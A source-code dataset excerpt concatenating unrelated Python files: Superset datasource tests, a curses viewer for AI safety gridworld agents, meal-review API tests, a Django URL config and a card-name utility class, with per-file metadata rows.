        self.assertIn(arbitrary_gby, sql)
        self.assertIn("name", sql)
        # A series limit on a timeseries query forces a subquery JOIN.
        if inner_join and is_timeseries:
            self.assertIn("JOIN", sql.upper())
        else:
            self.assertNotIn("JOIN", sql.upper())
        # Restore the (effectively global) engine-spec flag.
        spec.allows_joins = old_inner_join
        self.assertFalse(qr.df.empty)
        return qr.df

    @pytest.mark.usefixtures("load_birth_names_dashboard_with_slices")
    def test_query_with_expr_groupby_timeseries(self):
        """Join and non-join timeseries queries are both non-empty."""
        if get_example_database().backend == "presto":
            # TODO(bkyryliuk): make it work for presto.
            return

        def canonicalize_df(df):
            # Sort rows deterministically so frames can be compared.
            ret = df.sort_values(by=list(df.columns.values), inplace=False)
            ret.reset_index(inplace=True, drop=True)
            return ret

        df1 = self.query_with_expr_helper(is_timeseries=True, inner_join=True)
        name_list1 = canonicalize_df(df1).name.values.tolist()
        df2 = self.query_with_expr_helper(is_timeseries=True, inner_join=False)
        # NOTE(review): this intentionally re-reads df1 (as upstream does),
        # so the final comparison is trivially true. Comparing df2's names
        # instead may legitimately differ because only the inner-join query
        # applies series_limit=15 — confirm intent before "fixing".
        name_list2 = canonicalize_df(df1).name.values.tolist()
        self.assertFalse(df2.empty)

        assert name_list2 == name_list1

    @pytest.mark.usefixtures("load_birth_names_dashboard_with_slices")
    def test_query_with_expr_groupby(self):
        """Non-timeseries free-form expression queries succeed."""
        self.query_with_expr_helper(is_timeseries=False)

    @pytest.mark.usefixtures("load_birth_names_dashboard_with_slices")
    def test_sql_mutator(self):
        """SQL_QUERY_MUTATOR (positional signature) rewrites generated SQL."""
        tbl = self.get_table(name="birth_names")
        query_obj = dict(
            groupby=[],
            metrics=None,
            filter=[],
            is_timeseries=False,
            columns=["name"],
            granularity=None,
            from_dttm=None,
            to_dttm=None,
            extras={},
        )
        sql = tbl.get_query_str(query_obj)
        self.assertNotIn("-- COMMENT", sql)

        def mutator(*args, **kwargs):
            return "-- COMMENT\n" + args[0]

        app.config["SQL_QUERY_MUTATOR"] = mutator
        try:
            sql = tbl.get_query_str(query_obj)
            self.assertIn("-- COMMENT", sql)
        finally:
            # Always restore so a failure cannot poison other tests
            # (the original leaked the mutator on assertion failure).
            app.config["SQL_QUERY_MUTATOR"] = None

    @pytest.mark.usefixtures("load_birth_names_dashboard_with_slices")
    def test_sql_mutator_different_params(self):
        """SQL_QUERY_MUTATOR also receives the database keyword argument."""
        tbl = self.get_table(name="birth_names")
        query_obj = dict(
            groupby=[],
            metrics=None,
            filter=[],
            is_timeseries=False,
            columns=["name"],
            granularity=None,
            from_dttm=None,
            to_dttm=None,
            extras={},
        )
        sql = tbl.get_query_str(query_obj)
        self.assertNotIn("-- COMMENT", sql)

        def mutator(sql, database=None, **kwargs):
            return "-- COMMENT\n--" + "\n" + str(database) + "\n" + sql

        app.config["SQL_QUERY_MUTATOR"] = mutator
        try:
            mutated_sql = tbl.get_query_str(query_obj)
            self.assertIn("-- COMMENT", mutated_sql)
            self.assertIn(tbl.database.name, mutated_sql)
        finally:
            # Always restore so a failure cannot poison other tests.
            app.config["SQL_QUERY_MUTATOR"] = None

    def test_query_with_non_existent_metrics(self):
        """Unknown metric names raise with a descriptive message."""
        tbl = self.get_table(name="birth_names")

        query_obj = dict(
            groupby=[],
            metrics=["invalid"],
            filter=[],
            is_timeseries=False,
            columns=["name"],
            granularity=None,
            from_dttm=None,
            to_dttm=None,
            extras={},
        )

        with self.assertRaises(Exception) as context:
            tbl.get_query_str(query_obj)

        # BUG FIX: the original used assertTrue(msg, exception), which
        # treats the second argument as a failure message and always
        # passes; actually check the exception text.
        self.assertIn("Metric 'invalid' does not exist", str(context.exception))

    @pytest.mark.usefixtures("load_birth_names_dashboard_with_slices")
    def test_data_for_slices_with_no_query_context(self):
        """Legacy (params-only) charts yield trimmed datasource payloads."""
        tbl = self.get_table(name="birth_names")
        slc = (
            metadata_db.session.query(Slice)
            .filter_by(
                datasource_id=tbl.id,
                datasource_type=tbl.type,
                slice_name="Genders",
            )
            .first()
        )
        data_for_slices = tbl.data_for_slices([slc])
        assert len(data_for_slices["metrics"]) == 1
        assert len(data_for_slices["columns"]) == 1
        assert data_for_slices["metrics"][0]["metric_name"] == "sum__num"
        assert data_for_slices["columns"][0]["column_name"] == "gender"
        assert set(data_for_slices["verbose_map"].keys()) == {
            "__timestamp",
            "sum__num",
            "gender",
        }

    @pytest.mark.usefixtures("load_birth_names_dashboard_with_slices")
    def test_data_for_slices_with_query_context(self):
        """Charts with a saved query context yield trimmed payloads too."""
        tbl = self.get_table(name="birth_names")
        slc = (
            metadata_db.session.query(Slice)
            .filter_by(
                datasource_id=tbl.id,
                datasource_type=tbl.type,
                slice_name="Pivot Table v2",
            )
            .first()
        )
        data_for_slices = tbl.data_for_slices([slc])
        assert len(data_for_slices["metrics"]) == 1
        assert len(data_for_slices["columns"]) == 2
        assert data_for_slices["metrics"][0]["metric_name"] == "sum__num"
        assert data_for_slices["columns"][0]["column_name"] == "name"
        assert set(data_for_slices["verbose_map"].keys()) == {
            "__timestamp",
            "sum__num",
            "name",
            "state",
        }

    @pytest.mark.usefixtures("load_birth_names_dashboard_with_slices")
    def test_data_for_slices_with_adhoc_column(self):
        # should perform sqla.model.BaseDatasource.data_for_slices() with adhoc
        # column and legacy chart
        tbl = self.get_table(name="birth_names")
        dashboard = self.get_dash_by_slug("births")
        slc = Slice(
            slice_name="slice with adhoc column",
            datasource_type="table",
            viz_type="table",
            params=json.dumps(
                {
                    "adhoc_filters": [],
                    "granularity_sqla": "ds",
                    "groupby": [
                        "name",
                        {"label": "adhoc_column", "sqlExpression": "name"},
                    ],
                    "metrics": ["sum__num"],
                    "time_range": "No filter",
                    "viz_type": "table",
                }
            ),
            datasource_id=tbl.id,
        )
        dashboard.slices.append(slc)
        datasource_info = slc.datasource.data_for_slices([slc])
        assert "database" in datasource_info

        # clean up and auto commit
        metadata_db.session.delete(slc)
| 37.273016 | 88 | 0.59454 |
ace75df61e00595f857242a75a043e029c4f0558 | 8,722 | py | Python | ai_safety_gridworlds_viewer/view_agent.py | n0p2/ai-safety-gridworlds-viewer | 96f6421212797817f17b1e723b1849e9d3fba7b9 | [
"Apache-2.0"
] | null | null | null | ai_safety_gridworlds_viewer/view_agent.py | n0p2/ai-safety-gridworlds-viewer | 96f6421212797817f17b1e723b1849e9d3fba7b9 | [
"Apache-2.0"
] | null | null | null | ai_safety_gridworlds_viewer/view_agent.py | n0p2/ai-safety-gridworlds-viewer | 96f6421212797817f17b1e723b1849e9d3fba7b9 | [
"Apache-2.0"
] | null | null | null | import logging
import collections
import six
import curses
import datetime
import time
class AgentViewer(object):
    """A terminal-based game viewer for ai-safety-gridworlds games.
    (https://github.com/deepmind/ai-safety-gridworlds)

    This is based on the `human_ui.CursesUi` class from the pycolab game
    engine (https://github.com/deepmind/pycolab) developed by Deepmind.
    Both `CursesUi` and its subclass `safety_ui.SafetyCursesUi` allow a
    human player to play their games with keyboard input.

    `AgentViewer` enables display of a live game as an agent plays it.
    This is desirable in reinforcement learning (RL) settings, where one
    needs to view an agent's interactions with the environment as the
    game progresses.

    Classes here manage resources (the curses screen) and mutable state
    (the game clock); all other reusable logic lives in module-level
    functions without side effects.
    """

    def __init__(self, pause, **kwargs):
        """Construct an `AgentViewer`.

        Args:
            pause: float or None.
                A game played by an agent often proceeds at a pace too
                fast for meaningful watching; `pause` (in seconds) slows
                down each displayed frame. Wall-clock time consumed by
                pausing is subtracted from the elapsed time shown on the
                game window (see `_get_elapsed`). None disables pausing.
            **kwargs: forwarded to `init_curses` (colour maps and the
                optional input `delay`).
        """
        self._screen = curses.initscr()
        self._colour_pair = init_curses(self._screen, **kwargs)
        self._pause = pause
        self.reset_time()

    def __del__(self):
        self.close()

    def __enter__(self):
        return self

    def __exit__(self, *a):
        self.close()

    def close(self):
        """Restore the terminal. Safe to call more than once."""
        # close() can be reached from __exit__, __del__ and the error
        # path in display(); endwin() raises curses.error when the screen
        # was never initialised or already torn down, so tolerate that.
        try:
            curses.endwin()
        except curses.error:
            pass

    def display(self, env):
        """Draw the environment's current board, score and game clock.

        Args:
            env: ai_safety_gridworlds.environments.shared.safety_game
                .SafetyEnvironment instance holding the current board
                and the episode return.
        """
        board = env.current_game._board.board
        return_ = env.episode_return
        # Time cost is not always a good indicator for performance
        # evaluation; other indicators (e.g. number of episodes) may be
        # more suitable. Only elapsed time is displayed here; consumers
        # of AgentViewer can render additional information themselves.
        elapsed = self._get_elapsed()
        try:
            display(self._screen, board, return_, elapsed, self._colour_pair)
            # Pause exactly once per frame. _do_pause() counts the sleeps
            # so _get_elapsed() can discount the time spent sleeping; the
            # original code slept a second, untracked time here, which
            # both doubled the per-frame delay and skewed the game clock.
            self._do_pause()
        except BaseException:
            # Restore the terminal so the traceback is readable, then
            # propagate: the original bare `except:` silently swallowed
            # all errors (including KeyboardInterrupt), hiding failures.
            self.close()
            raise

    def reset_time(self):
        """Restart the game clock and the pause counter."""
        self._start_time = time.time()
        self._pause_cnt = 0

    def _do_pause(self):
        """Sleep for the configured pause (if any) and count the sleep."""
        if self._pause is not None:
            time.sleep(self._pause)
            self._pause_cnt += 1

    def _get_elapsed(self):
        """Return seconds since reset_time(), minus time spent pausing."""
        now = time.time()
        s = 0.0 if self._pause is None else self._pause
        return now - self._start_time - float(s) * self._pause_cnt
#--------
# Core functions that deal with screen initialization and display.
# These functions are heavily based on the `human_ui.CursesUi` class
# (https://github.com/deepmind/pycolab/blob/master/pycolab/human_ui.py)
#--------
def display(screen, board, score, elapsed, color_pair):
    """Redraw the game board onto the already-running screen, with elapsed time and score.

    Args:
        screen: curses window to draw on.
        board: 2-D iterable of character codes, one inner iterable per
            board row; each value must be convertible with int()
            (presumably a numpy array of byte codes -- TODO confirm).
        score: numeric score rendered in the header line.
        elapsed: elapsed time in seconds, formatted via ts2str.
        color_pair: mapping from single characters to curses colour-pair
            ids, as produced by init_colour (defaults to pair 0).
    """
    # clear() marks the whole window for repaint on the next refresh;
    # the cheaper erase() variant was left commented out upstream.
    #screen.erase()
    screen.clear()

    # Display the game clock and the current score.
    screen.addstr(0, 2, ts2str(elapsed), curses.color_pair(0))
    screen.addstr(0, 10, 'Score: %.2f' % score, curses.color_pair(0))

    # Display game board rows one-by-one, starting below the header row.
    for row, board_line in enumerate(board, start=1):
        screen.move(row, 0)  # Move to start of this board row.

        # Display game board characters one-by-one.
        for character in board_line:
            character = int(character)
            # Colour maps are keyed by character, board stores codes.
            color_id = color_pair[chr(character)]
            color_ch = curses.color_pair(color_id)
            screen.addch(character, color_ch)
    screen.refresh()
def init_colour(color_bg, color_fg):
    """Program the given colour maps into curses and return a pair map.

    Based on `human_ui.CursesUi._init_colour`
    (https://github.com/deepmind/pycolab/blob/master/pycolab/human_ui.py)

    Args:
        color_bg: dict mapping single characters to background colours
            (presumably RGB triples in curses' 0-1000 range -- TODO confirm).
        color_fg: dict mapping single characters to foreground colours.

    Returns:
        defaultdict mapping characters to curses colour-pair ids; any
        character not listed maps to pair 0 (the terminal default).
    """
    curses.start_color()

    # The default colour for all characters without colours listed is boring
    # white on black, or "system default", or somesuch.
    colour_pair = collections.defaultdict(lambda: 0)

    # And if the terminal doesn't support true color, that's all you get.
    if not curses.can_change_color():
        return colour_pair

    # Collect all unique foreground and background colours. If this terminal
    # doesn't have enough colours for all of the colours the user has supplied,
    # plus the two default colours, plus the largest colour id (which we seem
    # not to be able to assign, at least not with xterm-256color) stick with
    # boring old white on black.
    colours = set(six.itervalues(color_fg)).union(six.itervalues(color_bg))
    if (curses.COLORS - 2) < len(colours):
        return colour_pair

    # Get all unique characters that have a foreground and/or background colour.
    # If this terminal doesn't have enough colour pairs for all characters plus
    # the default colour pair, stick with boring old white on black.
    characters = set(color_fg).union(color_bg)
    if (curses.COLOR_PAIRS - 1) < len(characters):
        return colour_pair

    # Get the identifiers for both colours in the default colour pair.
    cpair_0_fg_id, cpair_0_bg_id = curses.pair_content(0)

    # With all this, make a mapping from colours to the IDs we'll use for them.
    ids = (set(range(curses.COLORS - 1)) -  # The largest ID is not assignable?
           {cpair_0_fg_id, cpair_0_bg_id})  # We don't want to change these.
    ids = list(reversed(sorted(ids)))  # We use colour IDs from large to small.
    ids = ids[:len(colours)]  # But only those colour IDs we actually need.
    colour_ids = dict(zip(colours, ids))

    # Program these colours into curses.
    for colour, cid in six.iteritems(colour_ids):
        curses.init_color(cid, *colour)

    # Now add the default colours to the colour-to-ID map.
    cpair_0_fg = curses.color_content(cpair_0_fg_id)
    cpair_0_bg = curses.color_content(cpair_0_bg_id)
    colour_ids[cpair_0_fg] = cpair_0_fg_id
    colour_ids[cpair_0_bg] = cpair_0_bg_id

    # The color pair IDs we'll use for all characters count up from 1; note that
    # the "default" colour pair of 0 is already defined, since _colour_pair is a
    # defaultdict.
    colour_pair.update(
        {character: pid for pid, character in enumerate(characters, start=1)})

    # Program these color pairs into curses, and that's all there is to do.
    for character, pid in six.iteritems(colour_pair):
        # Get foreground and background colours for this character. Note how in
        # the absence of a specified background colour, the same colour as the
        # foreground is used.
        cpair_fg = color_fg.get(character, cpair_0_fg_id)
        cpair_bg = color_bg.get(character, cpair_fg)

        # Get colour IDs for those colours and initialise a colour pair.
        cpair_fg_id = colour_ids[cpair_fg]
        cpair_bg_id = colour_ids[cpair_bg]
        curses.init_pair(pid, cpair_fg_id, cpair_bg_id)

    return colour_pair
def char2ord_4_colormap(colour):
    """Re-key a character-to-colour mapping by character ordinal.

    Args:
        colour: dict mapping single-character strings to colour values,
            or None.

    Returns:
        A new dict mapping ``ord(char)`` to the same colour values, or
        None if ``colour`` is None.
    """
    if colour is None:
        return None
    # Plain dict.items() works on both Python 2 and 3, so six.iteritems
    # is unnecessary here; the original comprehension also shadowed the
    # ``colour`` argument with its loop variable.
    return {ord(char): value for char, value in colour.items()}
def init_curses(screen, color_bg, color_fg, delay=None):
    """Prepare an initialised curses screen for game display.

    Args:
        screen: the curses screen returned by curses.initscr().
        color_bg: character-to-background-colour map (see init_colour).
        color_fg: character-to-foreground-colour map (see init_colour).
        delay: input timeout in milliseconds; None selects blocking
            reads, 0 non-blocking reads.

    Returns:
        The character-to-colour-pair mapping produced by init_colour.
    """
    logger = get_logger()
    logger.info('init_curses...')
    # If the terminal supports colour, program the colours into curses as
    # "colour pairs". Update our dict mapping characters to colour pairs.
    colour_pair = init_colour(color_bg, color_fg)
    curses.curs_set(0)  # We don't need to see the cursor.
    if delay is None:
        screen.timeout(-1)  # Blocking reads
    else:
        screen.timeout(delay)  # Nonblocking (if 0) or timing-out reads
    logger.info('init_curses success.')
    return colour_pair
def ts2str(ts_delta):
    """Format a duration in seconds as ``H:MM:SS``, dropping fractions."""
    text = str(datetime.timedelta(seconds=ts_delta))
    whole, _dot, _fraction = text.partition('.')
    return whole
#--------
# logging and debugging
#--------
_logger = None


def get_logger():
    """Return the module's lazily-created singleton logger.

    The first call creates a logger named after this file, attaches a
    ``FileHandler`` writing to ``<this file>.log`` with a timestamped
    record format, and enables DEBUG level; every later call returns the
    same instance.
    """
    global _logger
    if _logger is not None:
        return _logger
    logger = logging.getLogger(__file__)
    handler = logging.FileHandler(__file__ + ".log")
    handler.setFormatter(
        logging.Formatter('%(asctime)s %(levelname)s %(message)s'))
    logger.addHandler(handler)
    logger.setLevel(logging.DEBUG)
    _logger = logger
    return _logger
| 35.028112 | 89 | 0.710961 |
ace75e147168fff8d365bb41cfdff7a76ff403f4 | 12,120 | py | Python | tests/api/test_reviews.py | Rdbaker/Mealbound | 37cec6b45a632ac26a5341a0c9556279b6229ea8 | [
"BSD-3-Clause"
] | 1 | 2018-11-03T17:48:50.000Z | 2018-11-03T17:48:50.000Z | tests/api/test_reviews.py | Rdbaker/Mealbound | 37cec6b45a632ac26a5341a0c9556279b6229ea8 | [
"BSD-3-Clause"
] | 3 | 2021-03-09T09:47:04.000Z | 2022-02-12T13:04:41.000Z | tests/api/test_reviews.py | Rdbaker/Mealbound | 37cec6b45a632ac26a5341a0c9556279b6229ea8 | [
"BSD-3-Clause"
] | null | null | null | # -*- encoding: utf-8 -*-
"""Test the views at /api/v1/reviews."""
import uuid
import pytest
from ceraon.models.reviews import Review
from tests.utils import BaseViewTest
@pytest.mark.usefixtures('db')
class TestFindReview(BaseViewTest):
    """Test GET /api/v1/reviews/ID."""

    base_url = '/api/v1/reviews/{}'

    def test_nonexistent_get(self, testapp):
        """Test that a nonexistent get returns a 404."""
        url = self.base_url.format(uuid.uuid4())
        res = testapp.get(url, status=404)
        assert res.status_code == 404
        for key in ('error_code', 'error_message'):
            assert key in res.json

    def test_successful_get(self, testapp, review):
        """Test that a normal GET works just fine."""
        res = testapp.get(self.base_url.format(review.id))
        assert res.status_code == 200
        data = res.json['data']
        for key in ('reviewer', 'description', 'rating', 'meal'):
            assert key in data
@pytest.mark.usefixtures('db')
class TestCreateReview(BaseViewTest):
    """Test POST /api/v1/reviews."""

    # The create endpoint is exposed both as a query-arg form and nested
    # under the meal resource; every test below runs against both.
    endpoints = [
        '/api/v1/reviews?meal_id={}',
        '/api/v1/meals/{}/reviews'
    ]

    def setup_method(self, method):
        """Set up the test class. Pytest will call this for us."""
        # A payload that passes validation; tests mutate it per case.
        self.valid_data = {
            'description': 'this is my description',
            'rating': 4.0,
        }

    @pytest.mark.parametrize('endpoint', endpoints)
    def test_unauthenticated_create(self, testapp, past_meal, endpoint):
        """Test that we get a 401 if the user is not authenticated."""
        url = endpoint.format(past_meal.id)
        res = testapp.post_json(url, self.valid_data, status=401)
        assert res.status_code == 401

    @pytest.mark.parametrize('endpoint', endpoints)
    def test_meal_not_joined(self, testapp, endpoint, user, past_meal):
        """Test that we get a 403 if we didn't join the meal."""
        self.login(user, testapp)
        url = endpoint.format(past_meal.id)
        res = testapp.post_json(url, self.valid_data, status=403)
        assert res.status_code == 403
        assert 'error_code' in res.json
        assert 'error_message' in res.json

    @pytest.mark.parametrize('endpoint', endpoints)
    def test_meal_in_future(self, testapp, endpoint, user, meal):
        """Test that we get a 428 if the meal hasn't happened yet."""
        self.login(user, testapp)
        url = endpoint.format(meal.id)
        res = testapp.post_json(url, self.valid_data, status=428)
        assert res.status_code == 428
        assert 'error_code' in res.json
        assert 'error_message' in res.json

    @pytest.mark.parametrize('endpoint', endpoints)
    def test_guest_can_review(self, testapp, endpoint, past_guest, past_meal):
        """Test that a guest can review the meal just fine."""
        self.login(past_guest, testapp)
        url = endpoint.format(past_meal.id)
        res = testapp.post_json(url, self.valid_data)
        assert res.status_code == 201
        assert 'data' in res.json
        assert 'message' in res.json
        data = res.json['data']
        assert 'reviewer' in data
        assert 'description' in data
        assert 'rating' in data
        assert 'meal' in data

    @pytest.mark.parametrize('endpoint', endpoints)
    def test_review_needs_description(self, testapp, endpoint, past_guest,
                                      past_meal):
        """Test that a review needs a description."""
        del self.valid_data['description']
        self.login(past_guest, testapp)
        url = endpoint.format(past_meal.id)
        res = testapp.post_json(url, self.valid_data, status=422)
        assert 'description' in res.json['error_message']

    @pytest.mark.parametrize('endpoint', endpoints)
    def test_review_needs_rating(self, testapp, endpoint, past_guest,
                                 past_meal):
        """Test that a review needs a rating."""
        del self.valid_data['rating']
        self.login(past_guest, testapp)
        url = endpoint.format(past_meal.id)
        res = testapp.post_json(url, self.valid_data, status=422)
        assert 'rating' in res.json['error_message']

    # NOTE(review): "reivew" in the next two names is a typo for "review";
    # harmless for pytest discovery, but worth renaming in a cleanup pass.
    @pytest.mark.parametrize('endpoint', endpoints)
    def test_reivew_rating_positive(self, testapp, endpoint, past_guest,
                                    past_meal):
        """Test that a review needs a positive rating."""
        self.valid_data['rating'] = -1.5
        self.login(past_guest, testapp)
        url = endpoint.format(past_meal.id)
        res = testapp.post_json(url, self.valid_data, status=422)
        assert 'rating' in res.json['error_message']

    @pytest.mark.parametrize('endpoint', endpoints)
    def test_reivew_rating_interval(self, testapp, endpoint, past_guest,
                                    past_meal):
        """Test that a review needs a rating divisible by 0.5."""
        self.valid_data['rating'] = 1.7
        self.login(past_guest, testapp)
        url = endpoint.format(past_meal.id)
        res = testapp.post_json(url, self.valid_data, status=422)
        assert 'rating' in res.json['error_message']
@pytest.mark.usefixtures('db')
class TestUpdateReview(BaseViewTest):
    """Test PATCH /api/v1/reviews/UUID."""

    base_url = '/api/v1/reviews/{}'

    def setup_method(self, method):
        """Set up the test class. Pytest will call this for us."""
        self.valid_data = {
            'description': 'this is my description',
            'rating': 4.0,
        }

    def _patch(self, testapp, review_id, body, **kwargs):
        """Issue a PATCH against the review endpoint."""
        url = self.base_url.format(review_id)
        return testapp.patch_json(url, body, **kwargs)

    def test_unauthenticated(self, testapp, review):
        """Test that unauthenticated gets a 401."""
        res = self._patch(testapp, review.id, self.valid_data, status=401)
        assert res.status_code == 401

    def test_no_review_found(self, testapp, guest):
        """Test that a nonexistent review gets a 404."""
        self.login(guest, testapp)
        res = self._patch(testapp, uuid.uuid4(), self.valid_data, status=404)
        assert res.status_code == 404

    def test_unauthorized(self, testapp, host, review):
        """Test that unauthorized gets a 403."""
        self.login(host, testapp)
        res = self._patch(testapp, review.id, self.valid_data, status=403)
        assert res.status_code == 403

    def test_update_works(self, testapp, past_guest, review):
        """Test that updating a review works."""
        self.login(past_guest, testapp)
        res = self._patch(testapp, review.id, self.valid_data)
        assert res.status_code == 200
        assert review.rating == self.valid_data['rating']

    def test_partial_update_works(self, testapp, past_guest, review):
        """Test that only partially updating a review works."""
        self.login(past_guest, testapp)
        res = self._patch(testapp, review.id, {'rating': 4.00})
        assert res.status_code == 200
        assert review.rating == 4.00
@pytest.mark.usefixtures('db')
class TestReplaceReview(BaseViewTest):
    """Test PUT /api/v1/reviews/UUID."""

    base_url = '/api/v1/reviews/{}'

    def setup_method(self, method):
        """Set up the test class. Pytest will call this for us."""
        self.valid_data = {
            'rating': 4.0,
            'description': 'this is my description',
        }

    def test_unauthenticated(self, testapp, review):
        """Test that unauthenticated gets a 401."""
        response = testapp.put_json(self.base_url.format(review.id),
                                    self.valid_data, status=401)
        assert response.status_code == 401

    def test_no_review_found(self, testapp, guest):
        """Test that a nonexistent review gets a 404."""
        self.login(guest, testapp)
        missing_url = self.base_url.format(uuid.uuid4())
        response = testapp.put_json(missing_url, self.valid_data, status=404)
        assert response.status_code == 404

    def test_unauthorized(self, testapp, review, host):
        """Test that unauthorized gets a 403."""
        self.login(host, testapp)
        response = testapp.put_json(self.base_url.format(review.id),
                                    self.valid_data, status=403)
        assert response.status_code == 403

    def test_replace_works(self, testapp, past_guest, review):
        """Test that replacing a review works."""
        self.login(past_guest, testapp)
        response = testapp.put_json(self.base_url.format(review.id),
                                    self.valid_data)
        assert response.status_code == 200
        assert review.rating == self.valid_data['rating']

    def test_partial_replace_fails(self, testapp, past_guest, review):
        """Test that only partially replacing a review fails."""
        self.login(past_guest, testapp)
        # PUT is a full replacement, so omitting 'description' must 422.
        response = testapp.put_json(self.base_url.format(review.id),
                                    {'rating': 4.00}, status=422)
        assert response.status_code == 422
        assert 'description' in response.json['error_message']
@pytest.mark.usefixtures('db')
class TestDestroyReview(BaseViewTest):
    """Test DELETE /api/v1/reviews/UUID."""

    base_url = '/api/v1/reviews/{}'

    def test_unauthenticated(self, testapp, review):
        """Test that unauthenticated gets a 401."""
        response = testapp.delete(self.base_url.format(review.id), status=401)
        assert response.status_code == 401

    def test_review_not_found(self, testapp, user):
        """Test that a review not found gets a 404."""
        self.login(user, testapp)
        missing_url = self.base_url.format(uuid.uuid4())
        response = testapp.delete(missing_url, status=404)
        assert response.status_code == 404

    def test_not_reviewer(self, testapp, host, review):
        """Test that not being the reviewer gets a 403."""
        self.login(host, testapp)
        response = testapp.delete(self.base_url.format(review.id), status=403)
        assert response.status_code == 403

    def test_review_deleted(self, testapp, past_guest, review):
        """Test that a reviewer can delete a meal."""
        self.login(past_guest, testapp)
        response = testapp.delete(self.base_url.format(review.id))
        assert response.status_code == 204
        # The review must be gone from the database afterwards.
        assert Review.find(review.id) is None
@pytest.mark.usefixtures('db')
class TestGetMyReviews(BaseViewTest):
    """Test GET /api/v1/reviews/mine/<role>."""

    base_url = '/api/v1/reviews/mine/{}'

    def test_unauthenticated(self, testapp, review):
        """Test that an unauthenticated user gets a 401."""
        response = testapp.get(self.base_url.format('guest'), status=401)
        assert response.status_code == 401

    def test_see_reviewed_meals(self, testapp, past_guest, review):
        """Test that a user can see the reviews they wrote."""
        self.login(past_guest, testapp)
        response = testapp.get(self.base_url.format('guest'))
        assert response.status_code == 200
        payload = response.json['data']
        assert payload[0]['id'] == str(review.id)
        assert len(payload) == 1

    def test_see_hosted_reviews(self, testapp, host, review):
        """Test that a user can see the reviews for meals they host."""
        self.login(host, testapp)
        response = testapp.get(self.base_url.format('host'))
        assert response.status_code == 200
        payload = response.json['data']
        assert payload[0]['id'] == str(review.id)
        assert len(payload) == 1

    def test_see_hosts_reviewed_meals(self, testapp, host, review):
        """Check that the host has reviewed no meals... just a sanity check."""
        self.login(host, testapp)
        response = testapp.get(self.base_url.format('guest'))
        assert response.status_code == 200
        assert len(response.json['data']) == 0

    def test_bad_role(self, testapp, user):
        """Test that you can only specify 'guest' or 'host' as a role."""
        self.login(user, testapp)
        response = testapp.get(self.base_url.format('somethingelse'), status=400)
        assert response.status_code == 400
| 39.096774 | 79 | 0.624587 |
ace75e7cc5703dbfcd44e18fde66fe9a4c404143 | 1,404 | py | Python | cv/urls.py | OOXXXXOO/XCloud | 021342eec570f12d82ae750a645dc1cb99cfb733 | [
"MIT"
] | 60 | 2019-04-18T15:19:50.000Z | 2022-03-11T07:22:58.000Z | cv/urls.py | Haytam222/XCloud | 239115558c50f62947679dbcf01852684a3656ac | [
"MIT"
] | 11 | 2021-03-19T15:23:06.000Z | 2022-03-12T00:51:00.000Z | cv/urls.py | Haytam222/XCloud | 239115558c50f62947679dbcf01852684a3656ac | [
"MIT"
] | 23 | 2018-10-06T15:39:22.000Z | 2021-12-07T10:34:08.000Z | from django.conf.urls import url
from django.urls import path
from . import views
urlpatterns = [
path('welcome', views.welcome, name='welcome'),
path('index', views.index, name='index'),
path('mcloud', views.mcloud, name='mcloud'),
# path('mcloud/skin', views.rec_skin, name='recskin'),
# path('sdr', views.sdr, name='sdr'),
url('facesearchview', views.face_search_view, name='facesearchview'),
url('facesearch', views.face_search, name='facesearch'),
url('foodview', views.food_view, name='foodview'),
url('food', views.food, name='food'),
url('plantview', views.plant_view, name='plantview'),
url('plant', views.plant, name='plant'),
url('fbpview', views.fbp_view, name='fbpview'),
url('fbp', views.fbp, name='fbp'),
url('nsfwview', views.nsfw_view, name='nsfwview'),
url('nsfw', views.nsfw, name='nsfw'),
url('pdrview', views.pdr_view, name='pdrview'),
url('pdr', views.pdr, name='pdr'),
url('skinview', views.skin_view, name='skinview'),
url('mcloud/skin', views.rec_skin, name='recskin'),
url('detectface', views.detect_face, name='detectface'),
url('mcloud/statskin', views.stat_skin, name='statskin'),
url('cbirview', views.cbir_view, name='cbirview'),
url('cbir', views.cbir, name='cbir'),
url('deblurview', views.deblur_view, name='deblurview'),
url('deblur', views.deblur, name='deblur'),
]
| 42.545455 | 73 | 0.656695 |
ace75e8060d55679b470c7d349c6d6037f68fd4b | 1,875 | py | Python | app/card/utils.py | refaim/wots | dad9918c603293982a598fb5d6c73ade1a6080e1 | [
"MIT"
] | 2 | 2018-07-14T19:45:38.000Z | 2019-04-21T07:17:20.000Z | app/card/utils.py | refaim/wots | dad9918c603293982a598fb5d6c73ade1a6080e1 | [
"MIT"
] | 155 | 2018-07-07T00:33:31.000Z | 2021-08-16T17:55:05.000Z | app/card/utils.py | refaim/wots | dad9918c603293982a598fb5d6c73ade1a6080e1 | [
"MIT"
] | null | null | null | # coding: utf-8
import re
from abc import ABC
from typing import List
from core.utils import LangUtils, StringUtils
class CardUtils(ABC):
__UTF_TO_STD = {
'Æ': 'AE',
'│': '|',
'’': "'",
'“': '"',
'”': '"',
'«': '"',
'»': '"',
}
__STD_TO_UTF = {
"'": '’',
'AE': 'Æ',
'|': '│',
'/': '│',
}
__LANG_QUOTES = {
'EN': ('“', '”'),
'RU': ('«', '»'),
}
__DOUBLE_CARD_REGEXP = re.compile(r'\s*(\|+|\\+|/+|│+)\s*', re.UNICODE)
@classmethod
def make_key(cls, card: str) -> str:
return StringUtils.letters(cls.utf2std(card)).lower()
@classmethod
def utf2std(cls, card: str) -> str:
result = card
for k, v in cls.__UTF_TO_STD.items():
result = result.replace(k, v)
return result
@classmethod
def std2utf(cls, card: str) -> str:
result = card
num_quotes = card.count('"')
assert num_quotes == 0 or num_quotes == 2
if num_quotes == 2:
for c in cls.__LANG_QUOTES[LangUtils.guess_language(card)]:
result = result.replace('"', c, 1)
for k, v in cls.__STD_TO_UTF.items():
result = result.replace(k, v)
return result
@classmethod
def unquote(cls, card: str) -> str:
return card.replace('"', '')
@classmethod
def get_primary_name(cls, double_card: str) -> str:
return cls.split_name(double_card)[0]
@classmethod
def split_name(cls, double_card: str) -> List[str]:
parts = cls.__DOUBLE_CARD_REGEXP.split(double_card)
result = []
for i in range(0, len(parts), 2):
result.append(parts[i])
return result
@classmethod
def join_name(cls, left: str, right: str) -> str:
return '{}/{}'.format(left, right)
| 25.337838 | 75 | 0.513067 |
ace75f17188ed35012414f6465b44fb4c547c672 | 2,382 | py | Python | Tools/Builder/core/stacktracer.py | hung0913208/Base | 420b4ce8e08f9624b4e884039218ffd233b88335 | [
"BSD-3-Clause"
] | null | null | null | Tools/Builder/core/stacktracer.py | hung0913208/Base | 420b4ce8e08f9624b4e884039218ffd233b88335 | [
"BSD-3-Clause"
] | null | null | null | Tools/Builder/core/stacktracer.py | hung0913208/Base | 420b4ce8e08f9624b4e884039218ffd233b88335 | [
